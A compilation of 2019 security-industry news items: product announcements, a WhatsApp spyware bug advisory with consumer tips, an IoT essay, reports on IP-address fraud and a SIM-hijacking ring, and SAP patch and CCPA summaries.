Keysight Technologies, a leading technology company that helps enterprises, service providers and governments accelerate innovation to connect and secure the world, launched the next generation of network analyzers which deliver reliability and repeatability with best-in-class dynamic range, trace noise and temperature stability, as well as a wide range of software applications, enabling engineers to consistently achieve comprehensive device characterization. High-speed digital, wireless, aerospace and defense, and automotive companies need integrated active and passive components for … More

The post Keysight Technologies unveils new integrated network analyzers appeared first on Help Net Security.

Arm debuts eMRAM-enabled test chip and board on Samsung Foundry process technology

At the Samsung Foundry Forum, Arm, in collaboration with Samsung Foundry, Cadence, and Sondrel, demonstrated the first 28nm fully-depleted silicon-on-insulator (FD-SOI) embedded MagnetoResistive Random Access Memory (eMRAM) IoT test chip and development board. The Musca-S1 is designed to offer more choice to IoT designers in their system-on-chip (SoC) development journey. Designers can now easily implement more secure, holistic IoT solutions, enabling them to focus more on core product differentiation and accelerating time-to-market. “The promise of … More

The post Arm debuts eMRAM-enabled test chip and board on Samsung Foundry process technology appeared first on Help Net Security.

MarkLogic adds new features to its Data Hub 5.0 and MarkLogic 10

MarkLogic Corporation, the next generation data platform provider for simplifying data integration, announced Embedded Machine Learning and other features in the latest versions of the enterprise-grade MarkLogic Data Hub 5.0 and the MarkLogic 10 multi-model database. The enhancements make MarkLogic’s full stack offering an unparalleled enterprise solution for integrating, curating, securing, analyzing and acting on business-critical data as MarkLogic pushes the limits of modern data integration. The MarkLogic Data Hub, running in the cloud or … More

The post MarkLogic adds new features to its Data Hub 5.0 and MarkLogic 10 appeared first on Help Net Security.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, cybercriminals first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that fixes the problem – which means users will close the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind, now and in the future, when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up to date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important to always be careful about sharing personal data. Never exchange financial information or crucial personal details over the app, as they could be stolen in case your device does become compromised with spyware or other malware.
  • Protect your mobile phone from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

Sigma Systems expands its cloud-first strategy with Microsoft Azure

Sigma Systems, the global leader in catalog-driven software, is pleased to announce the expansion of its cloud-first strategy with deployment of its award-winning Create-Sell-Deliver portfolio on Microsoft Azure. With Sigma’s already strong base of cloud customers and a deepening commitment and enhanced integration to Microsoft Dynamics 365, the commitment to Azure further strengthens Sigma’s cloud-first strategy and unlocks new opportunities across multiple industries in collaboration with Microsoft. Tim Spencer, President and CEO, Sigma Systems, commented: … More

The post Sigma Systems expands its cloud-first strategy with Microsoft Azure appeared first on Help Net Security.

The Limitless Possibilities of IoT and Its Shortcomings

Imagine living in a world where smart refrigerators, autonomous driving vehicles, or self-regulated temperature homes are no longer pipe dreams. This type of futuristic society is coming to a life near you through the advent of the Internet of Things (IoT).

This is a technology revolution that has already begun as the IoT market is growing at an explosive rate. To be precise, by the year 2020, the IoT market is expected to become a $457B market with annual growth rates of close to 30%. The assimilation of IoT appliances and devices is a matter of when, not if.

However, what exactly are the benefits of having IoT so closely integrated in our lives, but more importantly, what are the drawbacks? This is what we hope to uncover below.

Refresh My Memory—What is IoT?

IoT describes any device that has the ability to connect to the internet, which opens the door to unique ways for users to interact with their devices.

For instance, have you ever wished your car would be able to tell you exactly when to get an oil change or when to replace your tires? How about if your refrigerator could tell you what food items are low in stock and could self-order more for online delivery? These are just simple examples of how IoT could shape and influence our lives moving forward.

We’ve become so accustomed to thinking computers, phones, or TVs are the only products capable of retrieving data from the internet. This just simply isn’t the case anymore.

As mobile networks continue to grow and provide proper coverage to all users, it’s inevitable that we begin seeing a diverse range of appliances that can connect to the internet. The next wave of appliances, such as connected/autonomous vehicles, will drive innovation in the future.

How Can IoT Improve Our Lives?

The possibilities are essentially endless when it comes to how IoT can shape our lives. Take, for example, how IoT could improve the efficiency of a simple lightbulb.

In the past, lightbulbs were neither energy efficient nor reliable in terms of when they would ultimately burn out. Through IoT advancements, smart light bulbs will now be able to connect to our mobile devices to display their current energy consumption, costs, and time to expiration, and to offer remote control capabilities.

IoT could also get as complicated as planning entire smart city infrastructure, such as driverless public transportation systems, efficient means of urban water usage, safer pedestrian traffic monitoring, or incredibly energy efficient buildings.

Singapore is actually one of the leaders in the smart city adoption market and hopes to become one of the world’s first complete smart nations. One of their top priorities is to make transportation fast, safe, and more efficient to cater to its needs as a major global business hub.

Singapore plans to feature fully autonomous vehicles and buses by 2022. This, coupled with IoT-powered traffic sensors, radars, and state-of-the-art cameras, will make Singapore one of the safest public infrastructures in the world for its everyday citizens.

Although the potential for IoT is limitless, so too are its possible drawbacks. Here is a quick examination of some of the major hurdles that the IoT industry must overcome in order to fully maximize its effectiveness.

With Great Power Comes Great Responsibility

Although IoT technologies can help our lives in many ways, there could be some roadblocks, such as privacy and security concerns, that need to be sorted out in order to achieve proper mass adoption.

As with any sort of device connected to the internet, speed will always be a constant worry in the back of users’ minds.

Latency could play a major role in the slow initial rollout of city-wide IoT initiatives, because such deployments need to be constantly connected to the internet with enormous demands for always-on data. At the current rate, we’d be hard pressed to have autonomous public buses drive through inclement weather over 4G technology. Faster and more stable connections will be a must.

A lot of these concerns could be alleviated with the launch of 5G networks, but 5G rollout will be quite slow, especially given the concern that its range will be much shorter than that of 4G/LTE.


A few years back, one of the hottest concepts coming out of the IoT field was the potential for connected cars of the future. By having internet ready vehicles, drivers would be able to automatically detect when to get their oil changed, whether their airbags are fully engaged and properly working, remotely control their vehicles through a mobile phone, etc.

However, one huge oversight with this concept was that leaving an automobile exposed over the internet invited hackers to take control of users’ vehicles. This instantly made automobiles one of the most sought-after hacking targets of cyber criminals around the world.

Hackers could, in effect, perform a hostile remote takeover of your vehicle to cut your brakes whenever they pleased, blast the heat during hot summer days, lock you out of your car, etc.

Since then, it has become apparent that connected cars must be properly secured, but this certainly was not an area of expertise for car manufacturers. Security for connected cars is still a visible problem today, since most of the data is exchanged via communications protocols that differ from those of a basic website or mobile network.

The challenge will be finding solutions that can effectively protect the communications protocols of a wide array of IoT appliances, such as automobiles, traffic lights, refrigerators, etc. Cloudbric is one solution that is looking to integrate cybersecurity across a wide array of protocols to help bring forth a safer and more connected future.

Another major hurdle of IoT will simply be the idea of having so many connected devices in our everyday lives. Living in a society where every electronic device or appliance is constantly monitoring your usage and data can be quite unsettling for some people who place a high importance on personal privacy. This can lead to issues such as corporate surveillance and having companies too closely integrated into our lives.

In order for IoT applications and technology to fully take off, manufacturers and governmental institutions need to prove to the public the actual merits of IoT and how it will better the lives of everyone involved. Rolling out innovative technology that is not fully vetted for security or could lead to potential data leaks would be a disaster that would take a long time to recover from.

Furthermore, the concept of running a smart city or nation would be asking users to give up a portion of their personal privacy without their knowledge or consent. This is simply recording the actions and habits of a city’s co-inhabitants without their permission. Major IoT players need to come up with strategies that help ease this concern in order for IoT to become a mainstay.

The upcoming IoT wave is inevitable and can present the world with many benefits that we could only have dreamed of in the past. The key hurdle is that companies need to fully prepare for the obvious issues (security, speed, and privacy) and also simultaneously gear up for potentially unknown issues that may arise (failure of critical IoT systems leading to potential accidents). By having proper protocols in place for now and for the future, it is safe to assume that IoT technology will certainly be the way of the future.

Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post The Limitless Possibilities of IoT and Its Shortcomings appeared first on Cloudbric.

Alcide launches continuous security and hygiene scanner for Kubernetes and Istio

Alcide, the cloud-native network security leader empowering DevSecOps with code-to-production continuous security for workloads running on Kubernetes, announced the release of Alcide Advisor. Alcide Advisor is a continuous security & hygiene scanner for Kubernetes & Istio, which automatically scans for the widest range of compliance, security and governance risks and vulnerabilities. Already deployed in numerous customer environments, and fully integrated with the CI/CD pipeline, it empowers engineering teams to maintain engineering motion and quickly identify … More

The post Alcide launches continuous security and hygiene scanner for Kubernetes and Istio appeared first on Help Net Security.

Syncsort and Snowflake to support growing demand for advanced cloud analytics

Syncsort, the global leader in Big Iron to Big Data software, announced seamless data integration with Snowflake, provider of the only data warehouse built for the cloud. The new integration will enable mutual customers to access, transform and deliver critical customer and financial data from the mainframe to Snowflake for advanced analytics. As the system of record for many large organizations, mainframe data provides key insights that support top business use cases such as new … More

The post Syncsort and Snowflake to support growing demand for advanced cloud analytics appeared first on Help Net Security.

TELUS completes successful testing of Neustar’s STIR/SHAKEN solution

Neustar, a trusted, neutral provider of real-time information services, and TELUS, one of Canada’s largest telecommunications companies, announced a successfully completed test of Neustar’s Certified Caller software suite deployed in TELUS’s NFV lab environment to authenticate and verify calls using the STIR/SHAKEN protocol. This significant milestone supports the Canadian Radio-Television and Telecommunications Commission (CRTC) request of telecommunications service providers to deploy caller ID authentication and verification for voice over internet (VoIP) calls to reduce illegal … More

The post TELUS completes successful testing of Neustar’s STIR/SHAKEN solution appeared first on Help Net Security.

The Sad State of New Zealand’s Cyber Attack Readiness

The New Zealand Financial Innovation & Technology Association (FinTechNZ), a financial-technology organization, has exposed the alarming situation of companies based in New Zealand: only around 6% have a reasonable level of cybersecurity defense infrastructure and readiness in place. Such a level is very low considering the number of multinational companies with a local branch office in New Zealand and the eagerness of the government to comply with its internal IT security arrangements, both for itself and for businesses operating within the country’s territory.

“We need to increase protection against attacks, especially bearing in mind that more than 90 percent of New Zealand companies are small businesses. New Zealand is not exempt from major cyber-attacks which could impinge on the economy and livelihood as a nation. We need to understand the multi-dimensional nature of cyber threats and key issues that government and private sector face,” explained James Brown, FintechNZ’s General Manager.

New Zealand’s NCSC has observed at least 347 cases of cybersecurity breaches and cyber attacks in its latest record, covering July 2017 to June 2018, the majority of which were not perpetrated by professional private hacking groups but rather by hacking groups allegedly funded by rogue states.

“Cyber risks are a borderless challenge and we can always improve on national preparedness in our cyber-attack strategy. We want to ensure the cybersecurity of our national infrastructures, our businesses and people. Cyber-crime is rising and is increasingly being identified as a top threat to New Zealand, as criminals, rogue nations and others in the darknet seek to strike and disrupt at any moment. The tech sector epitomises Kiwi ingenuity and entrepreneurial flair. With exports amounting to nearly $7 billion and total revenue predicted exceeding $10 billion in 2017, the industry is an integral part of the New Zealand economy,” concluded Brown.

Unlike the nuclear arms race that ran from the early Cold War to the late ’90s, cyberwarfare has been raging between states for quite a while now without the knowledge of the ordinary person. Also known as cyber espionage and digital hijacking, cyber warfare is waged by various countries with their own goals in mind, which makes it very difficult to read why they are doing it against other nations.

The post The Sad State of New Zealand’s Cyber Attack Readiness appeared first on .

Mastercard’s new API based digital platform integrates fintech solutions and Mastercard capabilities

Mastercard introduced the Mastercard Innovation Engine, an API based digital platform that gives issuers and merchants a simplified path to rapidly deploying digital capabilities and experiences to their customers. The plug-and-play platform seamlessly brings together Mastercard assets and financial-technology services to deliver unique and digitally integrated solutions and consumer experiences through a single connection. The platform facilitates collaboration and drives continuous innovation across the ecosystem. “Consumer expectations are changing rapidly and as a result we … More

The post Mastercard’s new API based digital platform integrates fintech solutions and Mastercard capabilities appeared first on Help Net Security.

A Tough Week for IP Address Scammers

In the early days of the Internet, there was a period when Internet Protocol version 4 (IPv4) addresses (e.g. were given out like cotton candy to anyone who asked. But these days companies are queuing up to obtain new IP space from the various regional registries that periodically dole out the prized digits. With the value of a single IP hovering between $15-$25, those registries are now fighting a wave of shady brokers who specialize in securing new IP address blocks under false pretenses and then reselling to spammers. Here’s the story of one broker who fought back in the courts, and lost spectacularly.

On May 14, South Carolina U.S. Attorney Sherri Lydon filed criminal wire fraud charges against Amir Golestan, alleging he and his Charleston, S.C. based company Micfo LLC orchestrated an elaborate network of phony companies and aliases to secure more than 735,000 IPs from the American Registry for Internet Numbers (ARIN), a nonprofit which oversees IP addresses assigned to entities in the U.S., Canada, and parts of the Caribbean.

Interestingly, Micfo itself set this process in motion late last year when it sued ARIN. In December 2018, Micfo’s attorneys asked a federal court in Virginia to issue a temporary restraining order against ARIN, which had already told the company about its discovery of the phony front companies and was threatening to revoke some 735,000 IP addresses. That is, unless Micfo agreed to provide more information about its operations and customers.

At the time, many of the IP address blocks assigned to Micfo had been freshly resold to spammers. Micfo ultimately declined to provide ARIN the requested information, and as a result the court denied Micfo’s request (the transcript of that hearing is instructive and amusing).

But by virtue of the contract Micfo signed with ARIN, any further dispute had to be settled via arbitration. On May 13, that arbitration panel ordered Micfo to pay $350,000 for ARIN’s legal fees and to cough up any of those 735,000 IPs the company hadn’t already sold.

According to the criminal indictment in South Carolina, in 2017 and 2018 Golestan sold IP addresses using a third party broker:

“Golestan sold 65,536 IPv4 addresses for $13 each, for a total of $851,896,” the indictment alleges. “Golestan also organized a second transaction for another 65,536 IP addresses, for another approximately $1 million. During this same time period, Golestan had a contract to sell 327,680 IP addresses at $19 per address, for a total of $6.22 million” [this last transaction would be blocked.]

The various front companies alleged to have been run by Micfo and Amir Golestan.

Mr. Golestan could not be immediately reached for comment. Golestan’s attorney in Micfo’s lawsuit against ARIN declined to comment on either the criminal charges or the arbitration outcome. Calls to nearly a dozen of the front companies named in the dispute mostly just rang and rang with no answer, or went to voicemail boxes that were full.

Stephen Ryan is a Washington, D.C.-based attorney who represented ARIN in the dispute filed by Micfo. Ryan said this was the first time ARIN’s decision to revoke IP address space resulted in a court battle — let alone arbitration.

“We have revoked addresses for fraud before, but that hasn’t previously resulted in litigation,” Ryan said. “The interesting thing here is that they litigated this for five months.”

According to a press release by ARIN, “Micfo obtained and utilized 11 shelf companies across the United States, and intentionally created false aliases purporting to be officers of those companies, to induce ARIN into issuing the fraudulently sought IPv4 resources and approving related transfers and reassignments of these addresses. The defrauding party was monetizing the assets obtained in the transfer market, and obtained resources under ARIN’s waiting list process.”

“This was an elaborate operation,” said Ryan, a former federal prosecutor. “All eleven of these front companies for Micfo are still up on the Web, where you see all these wonderful people who allegedly work there. And meanwhile we were receiving notarized affidavits in the names of people that were false. It made it much more interesting to do this case because it created 11 states where they’d violated the law.”

The criminal complaint against Golestan and Micfo (PDF) includes 20 counts of wire fraud associated with the phony companies allegedly set up by Micfo.

John Levine, author of The Internet for Dummies and a member of the security and stability advisory committee at ICANN, said ARIN does not exactly have a strong reputation for going after the myriad IP address scammers allegedly operating in a similar fashion as Micfo.

“It is definitely the case that for a long time ARIN has not been very aggressive about checking the validity of IP address applications and transfers, and now it seems they are somewhat better than they used to be,” Levine said. “A lot of people have been frustrated that ARIN doesn’t act more like a regulator in this space. Given how increasingly valuable IPv4 space is, ARIN has to be more vigilant because the incentive for crooks to do this kind of thing is very high.”

Asked if ARIN would have the stomach and budget to continue the fight if other IP address scammers fight back in a similar way, Ryan said ARIN would not back down from the challenge.

“If we find a scheme or artifice to defraud and it’s a substantial number of addresses and it’s egregious fraud, then yes, we have a reserve set aside for litigation and we can and will use it for cases like this,” Ryan said, adding that he’d welcome anyone with evidence of similar schemes to come forward. “But a better strategy is not to issue it and never have to go back and revoke it, and we’re good at that now.”

SAP Security Patch Day for May 2019 fixes many missing authorization checks

SAP released SAP Security Patch Day for May 2019 that includes 8 Security Notes, 5 of which are updates to previously released Notes.

Five Security Notes included in SAP Security Patch Day for May 2019 addressed missing authorization checks in SAP products, including Treasury and Risk Management, Solution Manager and ABAP managed systems, dbpool administration, and Enterprise Financial Services.

“Today, being the second Tuesday of the month, SAP released May’s Security Notes. This month, there are no critical or Hot News notes published, but there are three High Priority Notes, as well as two other SAP Security Notes affecting SAP Solution Manager (reported by the Onapsis Research Labs).” reads a blog post published by SAP security firm Onapsis. “This month, 50% of the patches are Missing Authorization Checks, which is higher than the average 15%. Even though this is one of the most common vulnerabilities in SAP software.”

SAP also released five Security Notes to address information disclosure vulnerabilities in several products, including BusinessObjects and Solution Manager.

The Security Note addressing a privilege escalation issue (CVE-2019-0301) in SAP Identity Management REST Interface Version 2 is the only Note rated High priority, while the remaining 12 are rated Medium.

“Under certain conditions, it is possible to request the modification of role or privilege assignments through SAP Identity Management REST Interface Version 2, which would otherwise be restricted only for viewing.” reads the security advisory for the CVE-2019-0301.

This is the most severe flaw; it received a CVSS score of 8.4.

Two flaws received a CVSS score of 6.3: an information disclosure in the BusinessObjects business intelligence platform (CVE-2019-0287), and a missing authorization check in Treasury and Risk Management (CVE-2019-0280).

SAP published updates for Security Notes released in October 2009, September 2010, December 2010, and March 2013.

“A total of 11 Security Notes were published in May and an additional three in late April after last month’s Patch Tuesday, represented in these types: Missing Authorization Checks (the most common type of vulnerability in SAP software), Information Disclosure, Cross-Site Scripting (XSS) and Privilege Escalation.” adds Onapsis.

Pierluigi Paganini

(SecurityAffairs – SAP Security Patch Day for May 2019)

The post SAP Security Patch Day for May 2019 fixes many missing authorization checks appeared first on Security Affairs.

Privacy Intelligence News & Insights: CCPA Amendments Overview

State Legislators continue to consider amendments to the California Consumer Privacy Act amidst uncertainty over how companies will meet the requirements, which go into effect January 1, 2020. Late last month six bills were advanced in the California Assembly that would greatly impact the force and effect of the CCPA as it was enacted almost a year ago. On April 23, 2019, the Privacy and Consumer Protection Committee passed these industry-backed amendments: AB 25, Chau: Expressly excludes contractors, agents, and job applicants from the definition of employees, to the extent their personal information is used for purposes compatible with that … Continue reading Privacy Intelligence News & Insights: CCPA Amendments Overview

The post Privacy Intelligence News & Insights: CCPA Amendments Overview appeared first on TrustArc Blog.

WhatsApp Vulnerability Fixed

WhatsApp fixed a devastating vulnerability that allowed someone to remotely hack a phone by initiating a WhatsApp voice call. The recipient didn't even have to answer the call.

The Israeli cyber-arms manufacturer NSO Group is believed to be behind the exploit, but of course there is no definitive proof.

If you use WhatsApp, update your app immediately.

Feds Break Up Major SIM-Hijacking Ring

The U.S. Department of Justice announced that it has arrested and charged members of a major cybercriminal ring in connection with $2.4 million worth of wire fraud and identity theft.

The hacking group, called “The Community”, primarily used social engineering (trickery) and SIM card hijacking to steal funds and cryptocurrency from its victims.

SIM swapping or hijacking is an attack that often uses personal information gleaned from other sources (such as social engineering) to authenticate a fraudster to a mobile phone company. Once authenticated, the mobile phone number of the target victim is moved to the criminal’s phone. Possession of the target’s phone number allows the criminal to receive calls and texts intended for the target, making it possible to bypass his or her two-factor authentication and thus gain access to the victim’s financial accounts.

Members of The Community face charges of wire fraud and aggravated identity theft. Three former mobile provider employees are also charged with accepting bribes to facilitate SIM-card hijacks for the group.

The post Feds Break Up Major SIM-Hijacking Ring appeared first on Adam Levin.